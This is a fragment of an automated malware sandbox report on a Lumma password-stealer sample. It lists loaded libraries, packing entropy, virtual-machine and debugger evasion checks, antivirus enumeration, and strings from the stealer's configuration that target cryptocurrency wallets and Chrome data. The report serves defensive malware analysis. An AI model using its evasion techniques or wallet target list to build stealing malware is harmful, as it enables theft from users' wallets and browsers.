        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EC9AC80_2_00EC9AC8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00ECDA180_2_00ECDA18
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D9FBC00_2_00D9FBC0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D97CF00_2_00D97CF0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E87C280_2_00E87C28
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DA3DC00_2_00DA3DC0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DDDDF00_2_00DDDDF0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DC9DB00_2_00DC9DB0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EA7D940_2_00EA7D94
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00D93E900_2_00D93E90
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00ED1EB00_2_00ED1EB0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EE5E800_2_00EE5E80
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00F5FF400_2_00F5FF40
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EA7F240_2_00EA7F24
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: String function: 00DFDD9C appears 123 times
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: Section: ZLIB complexity 1.0003577796546546
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: Section: ZLIB complexity 1.000732421875
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: Section: ZLIB complexity 1.0012637867647058
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: Section: .data ZLIB complexity 0.9967387602179837
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1171320779.0000000003F3A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeReversingLabs: Detection: 77%
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeVirustotal: Detection: 64%
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic file information: File size 1315328 > 1048576

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeUnpacked PE file: 0.2.SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe.d90000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name:
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E999C4 push 00E99A51h; ret 0_2_00E99A49
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EA40FC push 00EA4134h; ret 0_2_00EA412C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E3C0F4 push 00E3C120h; ret 0_2_00E3C118
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E3C0BC push 00E3C0E8h; ret 0_2_00E3C0E0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E08054 push 00E08080h; ret 0_2_00E08078
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E1E1DC push 00E1E26Ch; ret 0_2_00E1E264
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E40194 push 00E401CCh; ret 0_2_00E401C4
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E74194 push 00E741C0h; ret 0_2_00E741B8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E82160 push 00E8218Ch; ret 0_2_00E82184
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EDC124 push 00EDC150h; ret 0_2_00EDC148
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E1E12C push 00E1E1D7h; ret 0_2_00E1E1CF
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E602F0 push 00E6031Ch; ret 0_2_00E60314
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E60290 push 00E602C3h; ret 0_2_00E602BB
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E103A0 push 00E10400h; ret 0_2_00E103F8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EDE3A0 push 00EDE3CCh; ret 0_2_00EDE3C4
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00ED6388 push 00ED643Ch; ret 0_2_00ED6434
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E60394 push 00E603DFh; ret 0_2_00E603D7
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EA8394 push 00EA83C0h; ret 0_2_00EA83B8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EDE348 push 00EDE394h; ret 0_2_00EDE38C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E6033C push 00E60388h; ret 0_2_00E60380
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EA247C push 00EA24C8h; ret 0_2_00EA24C0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EF841C push 00EF845Ah; ret 0_2_00EF8452
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E225C4 push 00E225F0h; ret 0_2_00E225E8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E10578 push 00E105A4h; ret 0_2_00E1059C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E5E578 push ecx; mov dword ptr [esp], ecx0_2_00E5E57D
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E8055C push 00E805B6h; ret 0_2_00E805AE
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00F64548 push 00F6457Bh; ret 0_2_00F64573
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E886DC push 00E88747h; ret 0_2_00E8873F
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E0E6A4 push 00E0E74Ch; ret 0_2_00E0E744
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E10684 push ecx; mov dword ptr [esp], ecx0_2_00E10687
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E10664 push ecx; mov dword ptr [esp], ecx0_2_00E10667
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name: entropy: 7.99889700577149
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name: entropy: 7.941818540153546
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name: entropy: 7.913671463478191
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name: entropy: 7.977822899513002
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeStatic PE information: section name: .data entropy: 7.978649088354937
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeWindow / User API: threadDelayed 1219Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe TID: 7876Thread sleep count: 1219 > 30Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe TID: 7904Thread sleep time: -150000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe TID: 7900Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E24490 FindFirstFileW,0_2_00E24490
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258326313.0000000000DF3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258326313.0000000000F3D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1257159728.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1154518947.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1219992000.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1248003455.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1257974943.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209843275.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW2
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1257159728.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1154518947.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1257567906.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1219992000.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1248003455.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1257974943.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209843275.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1257885979.0000000000B53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258326313.0000000000F3D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258326313.0000000000DF3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258326313.0000000000F3D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1258326313.0000000000DF3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00DDC210 LdrInitializeThunk,0_2_00DDC210
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_02DA7F33 mov eax, dword ptr fs:[00000030h]0_2_02DA7F33
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_02DA7F35 mov eax, dword ptr fs:[00000030h]0_2_02DA7F35
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_02DA7C5F mov eax, dword ptr fs:[00000030h]0_2_02DA7C5F
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_02DA7C61 mov eax, dword ptr fs:[00000030h]0_2_02DA7C61
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00EA9268 cpuid 0_2_00EA9268
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,GetLocaleInfoA,0_2_00F5B208
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeCode function: 0_2_00E4ACC0 GetTimeZoneInformation,0_2_00E4ACC0
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1257421385.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1257159728.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1257974943.0000000000B81000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1248003455.0000000000B80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1219958282.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000002.1257910009.0000000000B5B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1257159728.0000000000B5B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1219992000.0000000000B80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe.d90000.0.unpack, type: UNPACKEDPE
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1257159728.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1257159728.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1257159728.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228498601.0000000000BE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nfanknocfeofbddgcijnmhnfnkdnaad","ez":"Coinbase","ldb":true},{"en":"hpglfhgfnhbgpjdenjgmdgoeiappafln","ez":"Guarda"},{"en":"blnieiiffboillknjnepogjhkgnoapac","ez":"EQUA"},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfo
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228498601.0000000000BE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wa
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228498601.0000000000BE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: dil","ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"}
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1257159728.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1209759288.0000000000BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
        Source: SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exe, 00000000.00000003.1228498601.0000000000BE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum",
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
